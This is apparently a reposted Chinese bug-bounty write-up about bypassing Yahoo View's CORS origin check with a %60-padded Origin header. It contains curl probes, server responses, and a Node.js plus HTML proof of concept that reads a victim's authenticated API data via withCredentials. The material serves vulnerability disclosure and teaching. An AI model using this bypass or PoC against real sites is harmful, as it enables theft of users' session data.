<progress id="hvafj"></progress>

溫馨提示×

溫馨提示×

您好，登錄后才能下訂單哦！

密碼登錄×

忘記密碼？

登錄注冊(cè)×

獲取短信驗(yàn)證碼

其他方式登錄

點(diǎn)擊登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

用戶登錄×

賬戶密碼登錄

請(qǐng)使用微信掃描上方二維碼

使用幫助

請(qǐng)求超時(shí)！

請(qǐng)點(diǎn)擊重新獲取二維碼

我如何繞過(guò)Yahoo以及View的CORS限制策略是什么

發(fā)布時(shí)間：2021-12-22 16:42:08 來(lái)源：億速云閱讀：171 作者：柒染欄目：網(wǎng)絡(luò)管理

這篇文章將為大家詳細(xì)講解有關(guān)我如何繞過(guò)Yahoo以及View的CORS限制策略是什么，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個(gè)參考，希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。

由于Yahoo!View存在不規(guī)范的CORS方式，允許遠(yuǎn)程攻擊者繞過(guò)其中的同源策略，通過(guò)特制請(qǐng)求繞過(guò)擬定頁(yè)面內(nèi)容限制，獲取相應(yīng)的目標(biāo)主機(jī)返回響應(yīng)。

CORS策略

通過(guò)Burp Suite被動(dòng)監(jiān)測(cè)功能發(fā)現(xiàn)，網(wǎng)站還對(duì)API https://api.view.yahoo.com發(fā)起請(qǐng)求，另外還存在跨域資源共享（CORS）策略。根據(jù)Mozilla開發(fā)者網(wǎng)絡(luò)文檔介紹，CORS使用附加HTTP頭的方式，允許用戶端獲得同一服務(wù)器不同域資源的訪問(wèn)權(quán)限，它定義了在跨域訪問(wèn)資源時(shí)瀏覽器和服務(wù)器之間的通信機(jī)制。

當(dāng)瀏覽器實(shí)施同源策略（Same-Origin）時(shí)，它只接收AJAX方式對(duì)同源資源的數(shù)據(jù)獲取請(qǐng)求，而跨域資源共享（CORS）策略則允許在指定站點(diǎn)外進(jìn)行數(shù)據(jù)共享。

Burp測(cè)試

在Burp中最開始的API請(qǐng)求如下：

GET /api/session/preferences HTTP/1.1
Host: api.view.yahoo.com
------- snip -------
origin: https://view.yahoo.com

服務(wù)端響應(yīng)如下：

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
------- snip -------
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://view.yahoo.com

由于服務(wù)端對(duì)origin端有響應(yīng)且允許請(qǐng)求帶有驗(yàn)證信息（Access-Control-Allow-Credentials）的設(shè)置為True，這樣一來(lái)，我們就能從其驗(yàn)證信息（如cookie）中竊取敏感信息了。

首先，我嘗試向API發(fā)送一個(gè)名為sxcurity.pro的請(qǐng)求源：

curl -vv 'http://api.view.yahoo.com/api/session/preferences' -H 'origin: https://sxcurity.pro'

隨后，服務(wù)端響應(yīng)中不包含Allow-Origin and Allow-Credentials；接下來(lái)，我嘗試向API發(fā)送一個(gè)名為view.sxcurity.pro的請(qǐng)求源：

curl -vv 'http://api.view.yahoo.com/api/session/preferences' -H 'origin: https://view.sxcurity.pro'

可還是沒有任何響應(yīng)；我突發(fā)奇想，能不能用view.yahoo.com.sxcurity.pro作請(qǐng)求源呢？：

curl -vv 'http://api.view.yahoo.com/api/session/preferences' -H 'origin: https://view.yahoo.com.sxcurity.pro'

但，還是沒Access-Control-Allow-Credentials或Access-Control-Allow-Origin響應(yīng)，請(qǐng)求源變化為view.yahoo.comsxcurity.pro也無(wú)濟(jì)于事。正當(dāng)我要放棄時(shí)，我想到了同時(shí)對(duì)兩個(gè)請(qǐng)求源發(fā)起請(qǐng)求：

curl -vv 'http://api.view.yahoo.com/api/session/preferences' -H 'origin: https://view.yahoo.com sxcurity.pro'

出乎意料，服務(wù)端竟然有了響應(yīng)：

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
------- snip -------
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://view.yahoo.com sxcurity.pro

我很好奇，試圖想出一種方法，來(lái)把它變?yōu)橐粋€(gè)有效的請(qǐng)求域名以便進(jìn)行后期利用，我嘗試向兩個(gè)域名之間填充一些字符，以查看服務(wù)端的響應(yīng)情況，如：

curl -vv 'http://api.view.yahoo.com/api/session/preferences' -H 'origin: https://view.yahoo.com%sxcurity.pro'

服務(wù)端響應(yīng)如下：

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
------- snip -------
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://view.yahoo.com%sxcurity.pro

雖然有所響應(yīng)，但由于請(qǐng)求源的域名無(wú)效，還是不能利用。

峰回路轉(zhuǎn)

在一番請(qǐng)教之后，我的一個(gè)朋友告訴我，可以參考他在HackerOne提交過(guò)的一個(gè)漏洞，他在其中使用了URL編碼符%60作為填充符，能有效繞過(guò)目標(biāo)網(wǎng)站CORS策略，因此我豁然開朗，也在此利用%60作為填充符來(lái)試試：

curl -vv 'http://api.view.yahoo.com/api/session/preferences' -H 'origin: https://view.yahoo.com%60cdl.sxcurity.pro'

這里竟然也能奏效：

Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://view.yahoo.com%60cdl.sxcurity.pro

于是乎，我在我的亞馬遜 Route 53上設(shè)置了相應(yīng)的通配符域名，打開Firefox瀏覽http://view.yahoo.com%60cdl.hack-r.be，不行，這....，由于不同瀏覽器保護(hù)策略不同，用Chrome、IE、Edge也都不行！用Mac的Safari竟然可以?。?，雖然Apache會(huì)把它誤認(rèn)為是一個(gè)服務(wù)端錯(cuò)誤。

隨后，我想到了用NodeJS和index.html的配合來(lái)實(shí)現(xiàn)漏洞利用，NodeJS的server.js如下：

const http = require('http')
const port = 6299
const fs = require("fs");
const requestHandler = (request, response) => {
  fs.readFile("index.html", function(err, data){
  response.writeHead(200, {'Content-Type': 'text/html'});
  response.write(data);
  response.end();
});
}
const server = http.createServer(requestHandler)
server.listen(port, (err) => {
  if (err) {
    return console.log('[+] ruh roh! something went wrong :(', err)
  }
  console.log(`[+] server is listening on port ${port}`)
})

index.html如下：

<!DOCTYPE html>
<html>
<head><title>CORS</title></head>
<body>
<center>
<h3>Yahoo CORs Exploit</h3>
<textarea rows="10" cols="60" id="pwnz">
</textarea><br>
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("pwnz").innerHTML = this.responseText;
    }
  };
  xhttp.open("GET", "http://api.view.yahoo.com/api/session/preferences", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>

最終，可以成功通過(guò)瀏覽http://view.yahoo.com%60cdl.hack-r.be，獲取到api.view.yahoo.com的一些相關(guān)信息。

關(guān)于我如何繞過(guò)Yahoo以及View的CORS限制策略是什么就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，可以學(xué)到更多知識(shí)。如果覺得文章不錯(cuò)，可以把它分享出去讓更多的人看到。

向AI問(wèn)一下細(xì)節(jié)

推薦閱讀：

免責(zé)聲明：本站發(fā)布的內(nèi)容（圖片、視頻和文字）以原創(chuàng)、轉(zhuǎn)載和分享為主，文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱：is@yisu.com進(jìn)行舉報(bào)，并提供相關(guān)證據(jù)，一經(jīng)查實(shí)，將立刻刪除涉嫌侵權(quán)內(nèi)容。

上一篇新聞：
使用Redis能解決什么問(wèn)題
下一篇新聞：
mysql中出現(xiàn)1053錯(cuò)誤怎么辦

猜你喜歡

AI
助
手

產(chǎn)品服務(wù)

地區(qū)劃分

專題活動(dòng)

幫助支持

關(guān)于我們

售后咨詢

7*24小時(shí)在線電話：400-100-2938

7*24小時(shí)在線 QQ：800811969

關(guān)注億速云

億速云公眾號(hào)

手機(jī)網(wǎng)站二維碼